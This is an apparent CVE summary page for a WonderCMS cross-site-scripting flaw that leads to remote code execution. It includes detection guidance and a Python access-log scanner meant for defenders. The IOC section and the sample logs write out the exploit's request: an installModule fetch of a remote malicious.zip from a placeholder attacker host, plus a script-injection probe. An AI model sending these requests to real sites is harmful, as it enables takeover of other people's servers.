CVE-2023-41425
published 2023-11-07

CVE-2023-41425: Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the…

Priority: P356 · Severity: medium · CVSS 3.1 base score: 6.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploit: available
EPSS: 54.31% (98.9th percentile)
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

Affected

1 range
Vendor: wondercms · Product: wondercms · Version range: 3.2.0 – 3.4.2 · Fixed in: (not listed)

Detection & IOCs (extracted from sources)

url/?installModule=http://<xip>:<xport>/malicious.zip&directoryName=pwned&type=themes&token=
  • Detect GET requests to the installModule endpoint whose installModule parameter is an external URL; this remote ZIP fetch is the XSS-to-RCE delivery mechanism used in the exploit.
  • Detect XSS payload injection aimed at the WonderCMS login page via the page parameter, which is how the malicious JavaScript is delivered to an authenticated admin.
  • Alert on JavaScript issuing XMLHttpRequest calls with withCredentials=true to the installModule endpoint, indicative of the XSS payload pivoting to RCE.
  • Flag ZIP file uploads or remote ZIP fetches via installModule where directoryName=pwned and type=themes; these are hardcoded attacker-chosen values in the public exploit.
  • This is an authenticated vulnerability: monitor for unusual admin-session activity followed by installModule requests that fetch external resources.
  • The attacker-controlled IP (xip) and port (xport) of the HTTP server hosting malicious.zip are runtime arguments and vary per attack, so no fixed IOC can be derived for them.
  • The exploit requires an authenticated admin session to reach the installModule endpoint; the XSS vector hijacks an active admin session, so detections should account for the two-stage delivery (XSS first, then RCE).
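The detection points above, turned into a small log-scanning check. This is an added example, not code from the page or from the WonderCMS project: it assumes Common Log Format access logs, a constructed list of the site's own hostnames (SITE_HOSTS), and constructed sample log lines; the installModule URL pattern and the directoryName/type values come from the IOC section above.

```python
"""Access-log heuristics for CVE-2023-41425 (WonderCMS installModule abuse)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SITE_HOSTS = {"cms.example.internal"}  # constructed: hostnames considered local to the CMS

def analyze_request(target: str) -> list[str]:
    """Return the indicator names triggered by one request target (path?query)."""
    findings = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # 1. installModule pointing at an external URL: remote ZIP fetch (XSS-to-RCE stage)
    for value in qs.get("installModule", []):
        u = urlsplit(unquote(value))
        if u.scheme in ("http", "https") and u.hostname and u.hostname not in SITE_HOSTS:
            findings.append("installModule_external_url")
    # 2. hardcoded parameter values from the public exploit
    if qs.get("directoryName") == ["pwned"] and qs.get("type") == ["themes"]:
        findings.append("exploit_default_params")
    # 3. script injection attempt through the page parameter (XSS stage);
    #    double-unquote catches payloads that were URL-encoded twice
    for value in qs.get("page", []):
        decoded = unquote(unquote(value)).lower()
        if "<script" in decoded or "onerror=" in decoded or "javascript:" in decoded:
            findings.append("page_param_script_injection")
    return findings

def scan_log(lines):
    """Return (client_ip, target, findings) for every parsable line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        found = analyze_request(m["target"])
        if found:
            hits.append((m["ip"], m["target"], found))
    return hits

# Constructed sample log: an XSS attempt on the login page, the follow-up remote
# module fetch from the hijacked admin session, and one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Nov/2023:09:59:50 +0000] "GET /loginURL?page=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024',
    '203.0.113.5 - - [07/Nov/2023:10:00:01 +0000] "GET /?installModule=http://198.51.100.7:8000/malicious.zip&directoryName=pwned&type=themes&token=abc123 HTTP/1.1" 200 512',
    '198.51.100.20 - - [07/Nov/2023:10:00:05 +0000] "GET /?page=home HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target, found in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(found))
```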